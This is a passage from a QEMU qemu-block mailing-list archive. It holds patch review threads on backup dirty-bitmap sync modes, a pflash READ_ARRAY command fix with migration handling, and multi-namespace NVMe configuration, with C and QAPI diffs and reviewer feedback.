006/18:[0010] [FC] 'block/backup: add 'never' policy to bitmap sync mode'
007/18:[] [--] 'hbitmap: Fix merge when b is empty, and result is not an 
alias of a'
008/18:[] [--] 'hbitmap: enable merging across granularities'
009/18:[0005] [FC] 'block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal'
010/18:[0003] [FC] 'block/dirty-bitmap: add bdrv_dirty_bitmap_get'
011/18:[0021] [FC] 'block/backup: upgrade copy_bitmap to BdrvDirtyBitmap'
012/18:[0020] [FC] 'block/backup: add 'always' bitmap sync policy'
013/18:[] [--] 'iotests: add testing shim for script-style python tests'
014/18:[] [--] 'iotests: teach run_job to cancel pending jobs'
015/18:[0005] [FC] 'iotests: teach FilePath to produce multiple paths'
016/18:[] [--] 'iotests: Add virtio-scsi device helper'
017/18:[0038] [FC] 'iotests: add test 257 for bitmap-mode backups'
018/18:[] [-C] 'block/backup: loosen restriction on readonly bitmaps'

001: Made suggested doc fixes.
 Changed 'since' to 4.2.
002: Added bds and aio_context to backup_common
 Removed accidental extraneous unref on target_bs
 Removed local_err propagation
003: Fallout from #002; hoist aio_context acquisition up into do_blockdev_backup
004: 'conditional' --> 'on-success'
005: Rediscover the lost stanza that ensures a bitmap mode was given
 Fallout from 2, 3, 4.
006: Block comment fix for patchew
 Fallout from #4
009: Fix assert() style issue. Why'd they let a macro be lowercase like that?
 Probably to make specifically my life difficult.
010: Fix style issue {
011: Fix long lines
 rename "bs" --> "target_bs" where appropriate
 Free copy_bitmap from the right node
012: Multiline comment changes for patchew
 Fallout from #4
015: Fix long line for patchew
 Reinstate that second newline that Max likes
017: Fallout from #4.

===
V2:
===

Changes:
004: Fixed typo
 Change @conditional docstring
005: Moved desugaring code into blockdev.c, facilitated by patches 1-3.
006: Change @never docstring slightly.
007: Merge will clear the target bitmap when both components bitmaps are empty,
 and the target bitmap is not an alias of either component bitmap.
008: Check orig_size (logical size) instead of size (actual size) to enable
 cross-granularity merging.
 Fix the sparse merge itself, based on the block/backup code.
 Clear the target bitmap before cross-granularity merge.
 Assert the size is itself equal when logical size and granularities are

Re: [Qemu-block] [PATCH v2 10/18] block/dirty-bitmap: add bdrv_dirty_bitmap_get

2019-07-05 Thread John Snow




On 7/4/19 1:01 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Add a public interface for get. While we're at it,
>> rename "bdrv_get_dirty_bitmap_locked" to "bdrv_dirty_bitmap_get_locked".
>>
>> (There are more functions to rename to the bdrv_dirty_bitmap_VERB form,
>> but they will wait until the conclusion of this series.)
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/dirty-bitmap.c | 18 +++---
>>  block/mirror.c   |  2 +-
>>  include/block/dirty-bitmap.h |  4 ++--
>>  migration/block.c|  5 ++---
>>  nbd/server.c |  2 +-
>>  5 files changed, 17 insertions(+), 14 deletions(-)
>>
>> diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
>> index b0f76826b3..97541521ab 100644
>> --- a/block/dirty-bitmap.c
>> +++ b/block/dirty-bitmap.c
>> @@ -509,14 +509,18 @@ BlockDirtyInfoList 
>> *bdrv_query_dirty_bitmaps(BlockDriverState *bs)
>>  }
>>  
>>  /* Called within bdrv_dirty_bitmap_lock..unlock */
>> -bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
>> -   int64_t offset)
>> +bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset)
>>  {
>> -if (bitmap) {
>> -return hbitmap_get(bitmap->bitmap, offset);
>> -} else {
>> -return false;
>> -}
>> +return hbitmap_get(bitmap->bitmap, offset);
>> +}
>> +
>> +bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset) {
> 
> I’m sure Patchew has told this already, but this is not Rust yet.
> 
> With that fixed:
> 
> Reviewed-by: Max Reitz 
> 

Why wait for rust to start living dangerously?

(Actually, just a thinko: I've been doing so much python lately that I
can only just barely remember to use a { instead of a :, and ...)

Re: [Qemu-block] [PATCH v2 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow

On 7/4/19 11:06 AM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Create a common core that comprises the actual meat of what the backup API
>> boundary needs to do, and then switch drive-backup to use it.
>>
>> Questions:
>>  - do_drive_backup now acquires and releases the aio_context in addition
>>to do_backup_common doing the same. Can I drop this from drive_backup?
> 
> I wonder why you don’t just make it a requirement that
> do_backup_common() is called with the context acquired?
> 

Oh, I remember: I wasn't actually sure if any of the calls that
drive-backup makes actually requires the AioContext. If that's true, no
reason to acquire it in two places and pass it in to the common function.

Probably bdrv_getlength and bdrv_refresh_filename both need it, though.
(Or at least, I can't promise they never wouldn't.)

--js

Re: [Qemu-block] [PATCH v2 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow




On 7/4/19 11:06 AM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Create a common core that comprises the actual meat of what the backup API
>> boundary needs to do, and then switch drive-backup to use it.
>>
>> Questions:
>>  - do_drive_backup now acquires and releases the aio_context in addition
>>to do_backup_common doing the same. Can I drop this from drive_backup?
> 
> I wonder why you don’t just make it a requirement that
> do_backup_common() is called with the context acquired?
> 

Ehm, it just honestly didn't occur to me that I could acquire the
context before doing the input sanitizing.

In this case, it is OK to do it, so I will hoist it back up into
do_blockdev_backup.

--js

>> Signed-off-by: John Snow 
>> ---
>>  blockdev.c | 138 -
>>  1 file changed, 83 insertions(+), 55 deletions(-)
>>
>> diff --git a/blockdev.c b/blockdev.c
>> index 4d141e9a1f..5fd663a7e5 100644
>> --- a/blockdev.c
>> +++ b/blockdev.c
>> @@ -3425,6 +3425,86 @@ out:
>>  aio_context_release(aio_context);
>>  }
>>  
>> +static BlockJob *do_backup_common(BackupCommon *backup,
>> +  BlockDriverState *target_bs,
>> +  JobTxn *txn, Error **errp)
>> +{
> 
> [...]
> 
>> +job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
>> +backup->sync, bmap, backup->compress,
>> +backup->on_source_error, 
>> backup->on_target_error,
>> +job_flags, NULL, NULL, txn, _err);
>> +if (local_err != NULL) {
>> +error_propagate(errp, local_err);
>> +goto out;
>> +}
> 
> Below, you change do_drive_backup() to just pass errp instead of
> local_err and not do error handling.  Why not do the same here?
> 

Inertia.

> Other than that:
> 
> Reviewed-by: Max Reitz 
> 

Suggestions applied, thank you.

Re: [Qemu-block] [PATCH v2 12/18] block/backup: add 'always' bitmap sync policy

2019-07-05 Thread John Snow




On 7/4/19 2:05 PM, Max Reitz wrote:
> On 04.07.19 19:43, Max Reitz wrote:
>> On 03.07.19 23:55, John Snow wrote:
>>> This adds an "always" policy for bitmap synchronization. Regardless of if
>>> the job succeeds or fails, the bitmap is *always* synchronized. This means
>>> that for backups that fail part-way through, the bitmap retains a record of
>>> which sectors need to be copied out to accomplish a new backup using the
>>> old, partial result.
>>>
>>> In effect, this allows us to "resume" a failed backup; however the new 
>>> backup
>>> will be from the new point in time, so it isn't a "resume" as much as it is
>>> an "incremental retry." This can be useful in the case of extremely large
>>> backups that fail considerably through the operation and we'd like to not 
>>> waste
>>> the work that was already performed.
>>>
>>> Signed-off-by: John Snow 
>>> ---
>>>  block/backup.c   | 25 +
>>>  qapi/block-core.json |  5 -
>>>  2 files changed, 21 insertions(+), 9 deletions(-)
>>>
>>> diff --git a/block/backup.c b/block/backup.c
>>> index 9cc5a7f6ca..495d8f71aa 100644
>>> --- a/block/backup.c
>>> +++ b/block/backup.c
>>> @@ -266,16 +266,25 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
>>> *job, int ret)
> 
> [...]
> 
>>> +/* If we failed and synced, merge in the bits we didn't copy: */
>>> +bdrv_dirty_bitmap_merge_internal(bm, job->copy_bitmap,
>>> + NULL, true);
>>
>> I presume this is for sync=full?
> 

Well, we don't allow bitmaps for sync=full at this point in the series.

> Ah, no.  This is necessary because the original sync bitmap was
> discarded by bdrv_dirty_bitmap_abdicate().  So yep, these bits need to
> go back into the sync bitmap then.
> 
> Max
> 

Yuh -- we actually want to clear the original bitmap for the 'always'
case, which the "abdicate" handles for us. This ought to trigger only
for the always case, so I think the conditional here is correct and as
simple as it can be.

Does your R-B stand?

--js

Re: [Qemu-block] [PATCH v2 11/18] block/backup: upgrade copy_bitmap to BdrvDirtyBitmap

2019-07-05 Thread John Snow




On 7/4/19 1:29 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> This simplifies some interface matters; namely the initialization and
>> (later) merging the manifest back into the sync_bitmap if it was
>> provided.
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/backup.c | 76 --
>>  1 file changed, 37 insertions(+), 39 deletions(-)
>>
>> diff --git a/block/backup.c b/block/backup.c
>> index d7fdafebda..9cc5a7f6ca 100644
>> --- a/block/backup.c
>> +++ b/block/backup.c
> 
> [...]
> 
>> @@ -202,7 +204,7 @@ static int coroutine_fn backup_do_cow(BackupBlockJob 
>> *job,
>>  cow_request_begin(_request, job, start, end);
>>  
>>  while (start < end) {
>> -if (!hbitmap_get(job->copy_bitmap, start)) {
>> +if (!bdrv_dirty_bitmap_get(job->copy_bitmap, start)) {
>>  trace_backup_do_cow_skip(job, start);
>>  start += job->cluster_size;
>>  continue; /* already copied */
>> @@ -296,14 +298,16 @@ static void backup_abort(Job *job)
>>  static void backup_clean(Job *job)
>>  {
>>  BackupBlockJob *s = container_of(job, BackupBlockJob, common.job);
>> +BlockDriverState *bs = blk_bs(s->target);
> 
> I’d prefer to call it target_bs, because “bs” is usually the source node.
> 

Sure;

> Which brings me to a question: Why is the copy bitmap assigned to the
> target in the first place?  Wouldn’t it make more sense on the source?
> 

*cough*;

the idea was that the target is *most likely* to be the temporary node
created for the purpose of this backup, even though backup does not
explicitly create the node.

So ... by creating it on the target, we avoid cluttering up the results
in block query; and otherwise it doesn't actually matter what node we
created it on, really.

I can move it over to the source, but the testing code has to get a
little smarter in order to find the "right" anonymous bitmap, which is
not impossible; but I thought this would actually be a convenience for
people.

>> +
>> +if (s->copy_bitmap) {
>> +bdrv_release_dirty_bitmap(bs, s->copy_bitmap);
>> +s->copy_bitmap = NULL;
>> +}
>> +
>>  assert(s->target);
>>  blk_unref(s->target);
>>  s->target = NULL;
>> -
>> -if (s->copy_bitmap) {
>> -hbitmap_free(s->copy_bitmap);
>> -s->copy_bitmap = NULL;
>> -}
>>  }
>>  
>>  void backup_do_checkpoint(BlockJob *job, Error **errp)
> 
> [...]
> 
>> @@ -387,59 +391,49 @@ static bool bdrv_is_unallocated_range(BlockDriverState 
>> *bs,
>>  
>>  static int coroutine_fn backup_loop(BackupBlockJob *job)
>>  {
>> -int ret;
>>  bool error_is_read;
>>  int64_t offset;
>> -HBitmapIter hbi;
>> +BdrvDirtyBitmapIter *bdbi;
>>  BlockDriverState *bs = blk_bs(job->common.blk);
>> +int ret = 0;
>>  
>> -hbitmap_iter_init(, job->copy_bitmap, 0);
>> -while ((offset = hbitmap_iter_next()) != -1) {
>> +bdbi = bdrv_dirty_iter_new(job->copy_bitmap);
>> +while ((offset = bdrv_dirty_iter_next(bdbi)) != -1) {
>>  if (job->sync_mode == MIRROR_SYNC_MODE_TOP &&
>>  bdrv_is_unallocated_range(bs, offset, job->cluster_size))
>>  {
>> -hbitmap_reset(job->copy_bitmap, offset, job->cluster_size);
>> +bdrv_set_dirty_bitmap(job->copy_bitmap, offset, 
>> job->cluster_size);
> 
> Should be reset.
> 

Whoa, oops! I got through testing FULL but, clearly, not TOP. This also
doesn't trigger any other failures in our test suite, so I need to make
sure this is being covered.

Thank you.

>>  continue;
>>  }
>>  
>>  do {
>>  if (yield_and_check(job)) {
>> -return 0;
>> +goto out;
>>  }
>>  ret = backup_do_cow(job, offset,
>>  job->cluster_size, _is_read, false);
>>  if (ret < 0 && backup_error_action(job, error_is_read, -ret) ==
>> BLOCK_ERROR_ACTION_REPORT)
>>  {
>> -return ret;
>> +goto out;
>>  }
>>  } while (ret < 0);
>>  }
>>  
>> -return 0;
>> + out:
>> +bdrv_dirty_iter_free(bdbi);
>> +return ret;
>>  }
>>  
>>  /* init copy_bitmap from sync_bitmap */
>>  static void backup_incremental_init_copy_bitmap(BackupBlockJob *job)
>>  {
>> -uint64_t offset = 0;
>> -uint64_t bytes = job->len;
>> -
>> -while (bdrv_dirty_bitmap_next_dirty_area(job->sync_bitmap,
>> - , ))
>> -{
>> -hbitmap_set(job->copy_bitmap, offset, bytes);
>> -
>> -offset += bytes;
>> -if (offset >= job->len) {
>> -break;
>> -}
>> -bytes = job->len - offset;
>> -}
>> +bdrv_dirty_bitmap_merge_internal(job->copy_bitmap, job->sync_bitmap,
>> + NULL, true);
> 
> How about asserting that this was successful?
> 

Sure.

>>  
>>

Re: [Qemu-block] [PATCH v3 2/9] hw/block/pflash_cfi01: Use the correct READ_ARRAY value

2019-07-05 Thread Laszlo Ersek

On 07/05/19 17:46, Philippe Mathieu-Daudé wrote:
> In the "Read Array Flowchart" the command has a value of 0xFF.
> 
> In the document [*] the "Read Array Flowchart", the READ_ARRAY
> command has a value of 0xff.
> 
> Use the correct value in the pflash model.
> 
> There is no change of behavior in the guest, because:
> - when the guest were sending 0xFF, the reset_flash label
>   was setting the command value as 0x00
> - 0x00 was used internally for READ_ARRAY
> 
> To keep migration behaving correctly, we have to increase
> the VMState version. When migrating from an older version,
> we use the correct command value.
> 
> [*] "Common Flash Interface (CFI) and Command Sets"
> (Intel Application Note 646)
> Appendix B "Basic Command Set"
> 
> Reviewed-by: John Snow 
> Reviewed-by: Alistair Francis 
> Regression-tested-by: Laszlo Ersek 
> Signed-off-by: Philippe Mathieu-Daudé 
> ---
> v3: Handle migrating the 'cmd' field.
> 
> Since Laszlo stated he did not test migration [*], I'm keeping his
> test tag, because the change with v2 has no impact in the tests
> he ran.

My thinking exactly. Thanks!
Laszlo

> 
> Likewise I'm keeping John and Alistair tags, but I'd like an extra
> review for the migration change, thanks!
> 
> [*] https://lists.gnu.org/archive/html/qemu-devel/2019-07/msg00679.html
> ---
>  hw/block/pflash_cfi01.c | 23 +--
>  1 file changed, 13 insertions(+), 10 deletions(-)
> 
> diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
> index 9e34fd4e82..58cbef0588 100644
> --- a/hw/block/pflash_cfi01.c
> +++ b/hw/block/pflash_cfi01.c
> @@ -100,7 +100,7 @@ static int pflash_post_load(void *opaque, int version_id);
>  
>  static const VMStateDescription vmstate_pflash = {
>  .name = "pflash_cfi01",
> -.version_id = 1,
> +.version_id = 2,
>  .minimum_version_id = 1,
>  .post_load = pflash_post_load,
>  .fields = (VMStateField[]) {
> @@ -277,10 +277,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr 
> offset,
>  /* This should never happen : reset state & treat it as a read */
>  DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  /* fall through to read code */
> -case 0x00:
> -/* Flash area read */
> +case 0xff: /* Read Array */
>  ret = pflash_data_read(pfl, offset, width, be);
>  break;
>  case 0x10: /* Single byte program */
> @@ -448,8 +447,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  case 0:
>  /* read mode */
>  switch (cmd) {
> -case 0x00: /* ??? */
> -goto reset_flash;
>  case 0x10: /* Single Byte Program */
>  case 0x40: /* Single Byte Program */
>  DPRINTF("%s: Single Byte Program\n", __func__);
> @@ -526,7 +523,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  if (cmd == 0xd0) { /* confirm */
>  pfl->wcycle = 0;
>  pfl->status |= 0x80;
> -} else if (cmd == 0xff) { /* read array mode */
> +} else if (cmd == 0xff) { /* Read Array */
>  goto reset_flash;
>  } else
>  goto error_flash;
> @@ -553,7 +550,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  } else if (cmd == 0x01) {
>  pfl->wcycle = 0;
>  pfl->status |= 0x80;
> -} else if (cmd == 0xff) {
> +} else if (cmd == 0xff) { /* read array mode */
>  goto reset_flash;
>  } else {
>  DPRINTF("%s: Unknown (un)locking command\n", __func__);
> @@ -645,7 +642,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  trace_pflash_reset();
>  memory_region_rom_device_set_romd(>mem, true);
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  }
>  
>  
> @@ -761,7 +758,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
> **errp)
>  }
>  
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  pfl->status = 0;
>  /* Hardcoded CFI table */
>  /* Standard "QRY" string */
> @@ -1001,5 +998,11 @@ static int pflash_post_load(void *opaque, int 
> version_id)
>  pfl->vmstate = qemu_add_vm_change_state_handler(postload_update_cb,
>  pfl);
>  }
> +if (version_id < 2) {
> +/* v1 used incorrect value of 0x00 for the READ_ARRAY command. */
> +if (pfl->cmd == 0x00) {
> +pfl->cmd =  0xff;
> +}
> +}
>  return 0;
>  }
>

Re: [Qemu-block] [PATCH v2 09/18] block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal

2019-07-05 Thread John Snow




On 7/4/19 12:49 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> I'm surprised it didn't come up sooner, but sometimes we have a +busy
>> bitmap as a source. This is dangerous from the QMP API, but if we are
>> the owner that marked the bitmap busy, it's safe to merge it using it as
>> a read only source.
>>
>> It is not safe in the general case to allow users to read from in-use
>> bitmaps, so create an internal variant that foregoes the safety
>> checking.
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/dirty-bitmap.c  | 51 +--
>>  include/block/block_int.h |  3 +++
>>  2 files changed, 47 insertions(+), 7 deletions(-)
>>
>> diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
>> index 95a9c2a5d8..b0f76826b3 100644
>> --- a/block/dirty-bitmap.c
>> +++ b/block/dirty-bitmap.c
>> @@ -810,11 +810,15 @@ bool bdrv_dirty_bitmap_next_dirty_area(BdrvDirtyBitmap 
>> *bitmap,
>>  return hbitmap_next_dirty_area(bitmap->bitmap, offset, bytes);
>>  }
>>  
>> +/**
>> + * bdrv_merge_dirty_bitmap: merge src into dest.
>> + * Ensures permissions on bitmaps are reasonable; use for public API.
>> + *
>> + * @backup: If provided, make a copy of dest here prior to merge.
>> + */
>>  void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap 
>> *src,
>>   HBitmap **backup, Error **errp)
>>  {
>> -bool ret;
>> -
>>  qemu_mutex_lock(dest->mutex);
>>  if (src->mutex != dest->mutex) {
>>  qemu_mutex_lock(src->mutex);
>> @@ -833,6 +837,37 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, 
>> const BdrvDirtyBitmap *src,
>>  goto out;
>>  }
>>  
>> +assert(bdrv_dirty_bitmap_merge_internal(dest, src, backup, false));
> 
> Please keep the explicit @ret.  We never define NDEBUG, but doing things
> with side effects inside of assert() is bad style nonetheless.
> 

Thank you for saving me from myself. I consistently forget this :(

>> +
>> +out:
>> +qemu_mutex_unlock(dest->mutex);
>> +if (src->mutex != dest->mutex) {
>> +qemu_mutex_unlock(src->mutex);
>> +}
>> +}
>> +
>> +/**
>> + * bdrv_dirty_bitmap_merge_internal: merge src into dest.
>> + * Does NOT check bitmap permissions; not suitable for use as public API.
>> + *
>> + * @backup: If provided, make a copy of dest here prior to merge.
>> + * @lock: If true, lock and unlock bitmaps on the way in/out.
>> + * returns true if the merge succeeded; false if unattempted.
>> + */
>> +bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
>> +  const BdrvDirtyBitmap *src,
>> +  HBitmap **backup,
>> +  bool lock)
>> +{
>> +bool ret;
>> +
>> +if (lock) {
>> +qemu_mutex_lock(dest->mutex);
>> +if (src->mutex != dest->mutex) {
>> +qemu_mutex_lock(src->mutex);
>> +}
>> +}
>> +
> 
> Why not check for INCONSISTENT and RO still?
> 
> Max
> 

Well. "why", I guess. The user-facing API will always use the
non-internal version. This is the scary dangerous version that you don't
call unless you are Very Sure You Know What You're Doing.

I guess I just intended for the suitability checking to happen in
bdrv_dirty_bitmap_merge, and this is the implementation that you can
shoot yourself in the foot with if you'd like.

>>  if (backup) {
>>  *backup = dest->bitmap;
>>  dest->bitmap = hbitmap_alloc(dest->size, 
>> hbitmap_granularity(*backup));
>

Re: [Qemu-block] [Qemu-devel] [PATCH v2 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread John Snow




On 7/5/19 10:18 AM, Markus Armbruster wrote:
> John Snow  writes:
> 
>> Depending on what a user is trying to accomplish, there might be a few
>> bitmap cleanup actions that occur when an operation is finished that
>> could be useful.
>>
>> I am proposing three:
>> - NEVER: The bitmap is never synchronized against what was copied.
>> - ALWAYS: The bitmap is always synchronized, even on failures.
>> - CONDITIONAL: The bitmap is synchronized only on success.
>>
>> The existing incremental backup modes use 'conditional' semantics,
>> so add just that one for right now.
>>
>> Signed-off-by: John Snow 
>> ---
>>  qapi/block-core.json | 14 ++
>>  1 file changed, 14 insertions(+)
>>
>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>> index 7b23efcf13..87eba5a5d9 100644
>> --- a/qapi/block-core.json
>> +++ b/qapi/block-core.json
>> @@ -1134,6 +1134,20 @@
>>  { 'enum': 'MirrorSyncMode',
>>'data': ['top', 'full', 'none', 'incremental'] }
>>  
>> +##
>> +# @BitmapSyncMode:
>> +#
>> +# An enumeration of possible behaviors for the synchronization of a bitmap
>> +# when used for data copy operations.
>> +#
>> +# @conditional: The bitmap is only synced when the operation is successful.
>> +#   This is the behavior always used for 'INCREMENTAL' backups.
>> +#
>> +# Since: 4.2
>> +##
>> +{ 'enum': 'BitmapSyncMode',
>> +  'data': ['conditional'] }
>> +
>>  ##
>>  # @MirrorCopyMode:
>>  #
> 
> The name "conditional" makes me go "on what?".  What about "on-success"?
> 

Good point. I do like that more.

Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread John Snow




On 7/5/19 10:14 AM, Markus Armbruster wrote:
> John Snow  writes:
> 
>> drive-backup and blockdev-backup have an awful lot of things in common
>> that are the same. Let's fix that.
>>
>> I don't deduplicate 'target', because the semantics actually did change
>> between each structure. Leave that one alone so it can be documented
>> separately.
>>
>> Signed-off-by: John Snow 
>> ---
>>  qapi/block-core.json | 103 ++-
>>  1 file changed, 33 insertions(+), 70 deletions(-)
>>
>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>> index 0d43d4f37c..7b23efcf13 100644
>> --- a/qapi/block-core.json
>> +++ b/qapi/block-core.json
>> @@ -1315,32 +1315,23 @@
>>'data': { 'node': 'str', 'overlay': 'str' } }
>>  
>>  ##
>> -# @DriveBackup:
>> +# @BackupCommon:
>>  #
>>  # @job-id: identifier for the newly-created block job. If
>>  #  omitted, the device name will be used. (Since 2.7)
>>  #
>>  # @device: the device name or node-name of a root node which should be 
>> copied.
>>  #
>> -# @target: the target of the new image. If the file exists, or if it
>> -#  is a device, the existing file/device will be used as the new
>> -#  destination.  If it does not exist, a new file will be created.
>> -#
>> -# @format: the format of the new destination, default is to
>> -#  probe if @mode is 'existing', else the format of the source
>> -#
>>  # @sync: what parts of the disk image should be copied to the destination
>>  #(all the disk, only the sectors allocated in the topmost image, 
>> from a
>>  #dirty bitmap, or only new I/O).
> 
> This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
> Is this a doc fix?
> 

Yes.

>>  #
>> -# @mode: whether and how QEMU should create a new image, default is
>> -#'absolute-paths'.
>> -#
>> -# @speed: the maximum speed, in bytes per second
>> +# @speed: the maximum speed, in bytes per second. The default is 0,
>> +# for unlimited.
> 
> This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
> unlimited."  Is this a doc fix?
> 

Yes.

>>  #
>>  # @bitmap: the name of dirty bitmap if sync is "incremental".
>>  #  Must be present if sync is "incremental", must NOT be present
>> -#  otherwise. (Since 2.4)
>> +#  otherwise. (Since 2.4 (Drive), 3.1 (Blockdev))
> 
> I second Max's request to say (drive-backup) and (blockdev-backup),
> strongly.
> 

OK.

>>  #
>>  # @compress: true to compress data, if the target format supports it.
>>  #(default: false) (since 2.8)
>> @@ -1372,73 +1363,45 @@
>>  #
>>  # Since: 1.6
> 
> BackupCommon is actually since 4.2.
> 
> The type doesn't appear in the external interface (only its extensions
> DriveBackup and BlockdevBackup do), so documenting "since" is actually
> pointless.  However, we blindly document "since" for *everything*,
> simply because we don't want to waste time on deciding whether we have
> to.
> 

Ah, sure.

>>  ##
>> +{ 'struct': 'BackupCommon',
>> +  'data': { '*job-id': 'str', 'device': 'str',
>> +'sync': 'MirrorSyncMode', '*speed': 'int',
>> +'*bitmap': 'str', '*compress': 'bool',
>> +'*on-source-error': 'BlockdevOnError',
>> +'*on-target-error': 'BlockdevOnError',
>> +'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
>> +
>> +##
>> +# @DriveBackup:
>> +#
>> +# @target: the target of the new image. If the file exists, or if it
>> +#  is a device, the existing file/device will be used as the new
>> +#  destination.  If it does not exist, a new file will be created.
>> +#
>> +# @format: the format of the new destination, default is to
>> +#  probe if @mode is 'existing', else the format of the source
>> +#
>> +# @mode: whether and how QEMU should create a new image, default is
>> +#'absolute-paths'.
>> +#
>> +# Since: 1.6
>> +##
>>  { 'struct': 'DriveBackup',
>> -  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
>> -'*format': 'str', 'sync': 'MirrorSyncMode',
>> -'*mode': 'NewImageMode', '*speed': 'int',
>> -'*bitmap': 'str', '*compress': 'bool',
>> -'*on-source-error': 'BlockdevOnError',
>> -'*on-target-error': 'BlockdevOnError',
>> -'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
>> +  'base': 'BackupCommon',
>> +  'data': { 'target': 'str',
>> +'*format': 'str',
>> +'*mode': 'NewImageMode' } }
>>  
>>  ##
>>  # @BlockdevBackup:
>>  #
>> -# @job-id: identifier for the newly-created block job. If
>> -#  omitted, the device name will be used. (Since 2.7)
>> -#
>> -# @device: the device name or node-name of a root node which should be 
>> copied.
>> -#
>>  # @target: the device name or node-name of the backup target node.
>>  #
>> -# @sync: what parts of the disk image should be copied to the destination
>> -#(all the disk, only the sectors

Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Daniel P . Berrangé

On Fri, Jul 05, 2019 at 06:20:14PM +0200, Klaus Birkelund wrote:
> On Fri, Jul 05, 2019 at 02:49:29PM +0100, Daniel P. Berrangé wrote:
> > On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> > > On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > > > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > > > device model. The nvme device creates a bus named from the device name
> > > > ('id'). The nvme-ns devices then connect to this and registers
> > > > themselves with the nvme device.
> > > > 
> > > > This changes how an nvme device is created. Example with two namespaces:
> > > > 
> > > >   -drive file=nvme0n1.img,if=none,id=disk1
> > > >   -drive file=nvme0n2.img,if=none,id=disk2
> > > >   -device nvme,serial=deadbeef,id=nvme0
> > > >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
> > > >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > > > 
> > > > A maximum of 256 namespaces can be configured.
> > > > 
> > >  
> > > Well that was embarrasing.
> > > 
> > > This patch breaks nvme-test.c. Which I obviously did not run.
> > > 
> > > In my defense, the test doesn't do much currently, but I'll of course
> > > fix the test for v2.
> > 
> > That highlights a more serious problem.  This series changes the syntx
> > for configuring the nvme device in a way that is not backwards compatible.
> > So anyone who is using QEMU with NVME will be broken when they upgrade
> > to the next QEMU release.
> > 
> > I understand why you wanted to restructure things to have a separate
> > nvme-ns device, but there needs to be some backcompat support in there
> > for the existing syntax to avoid breaking current users IMHO.
> > 
>  
> Hi Daniel,
> 
> I raised this issue previously. I suggested that we keep the drive
> property for the nvme device and only accept either that or an nvme-ns
> device to be configured (but not both).
> 
> That would keep backward compatibilty, but enforce the use of nvme-ns
> for any setup that requires multiple namespaces.
> 
> Would that work?

Yes, that would be viable, as an existing CLI arg usage would continue
to be supported as before.

We could also list the back compat syntax as a deprecation in the docs
(qemu-deprecated.texi) so that in a few releases in the future, we can
drop the old syntax and then use nvme-ns exclusively thereafter.

Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund

On Fri, Jul 05, 2019 at 02:49:29PM +0100, Daniel P. Berrangé wrote:
> On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> > On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > > device model. The nvme device creates a bus named from the device name
> > > ('id'). The nvme-ns devices then connect to this and registers
> > > themselves with the nvme device.
> > > 
> > > This changes how an nvme device is created. Example with two namespaces:
> > > 
> > >   -drive file=nvme0n1.img,if=none,id=disk1
> > >   -drive file=nvme0n2.img,if=none,id=disk2
> > >   -device nvme,serial=deadbeef,id=nvme0
> > >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
